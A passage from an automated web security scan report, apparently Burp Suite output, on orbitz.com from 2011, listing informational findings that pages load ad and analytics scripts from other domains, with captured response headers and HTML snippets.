://www.revresda.com/html.ng/channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296674846610&dsrc=7&"></script>
...[SNIP]...

18.823. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805620&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.824. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662802579&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.825. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

18.826. http://www.orbitz.com/hotels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/

Issue detail

The response dynamically includes the following script from another domain:

http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

18.827. http://www.orbitz.com/hotels/Canada--ON/Toronto/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/Canada--ON/Toronto/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663198575&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=CA&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Toronto&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663198575&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=CA&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Toronto&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663198575&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=CA&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Toronto&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28434626E0D56CD35CBF1103FC110834; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:27:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:13:18 GMT
Content-Length: 548686

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663198575&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=CA&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Toronto&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663198575&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=CA&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Toronto&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663198575&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=CA&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Toronto&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.828. http://www.orbitz.com/hotels/France/Nice/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/France/Nice/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663131173&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Nice&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663131173&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Nice&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663131173&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Nice&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1AF2BDC7336554AF99ED45E1A21894A1; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:17 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:10 GMT
Content-Length: 525349

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663131173&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Nice&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663131173&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Nice&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663131173&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Nice&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.829. http://www.orbitz.com/hotels/France/Paris/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/France/Paris/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663128736&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Paris&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663128736&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Paris&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663128736&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Paris&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C8A51BA9BDBBD26D20FC4334F7CA2E66; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:15 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:07 GMT
Content-Length: 539958

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663128736&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Paris&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663128736&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Paris&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663128736&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=FR&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Paris&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.830. http://www.orbitz.com/hotels/Mexico/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/Mexico/

Issue detail

The response dynamically includes the following script from another domain:

http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

18.831. http://www.orbitz.com/hotels/Mexico/Cancun/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/Mexico/Cancun/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663142219&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Cancun&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663142219&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Cancun&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663142219&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Cancun&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7C11ECB0E3B30FA10F527B9D00A483D; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:21 GMT
Content-Length: 584000

...[SNIP]...

       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=top1&Section=search&channel=hotel&tile=1296663142219&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Cancun&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663142219&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Cancun&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&pos=bottom2&Section=search&channel=hotel&tile=1296663142219&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Cancun&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"></script>
...[SNIP]...

18.832. http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/Mexico/Playa_Del_Carmen/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.revresda.com/js.ng/adsize=568x143&pos=bottom1&Section=search&channel=hotel&tile=1296663148701&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&searchType=hotel&m=0&CookieName=PRO2&country=MX&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&area=dynamo&dest=Playa%20Del%20Carmen&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
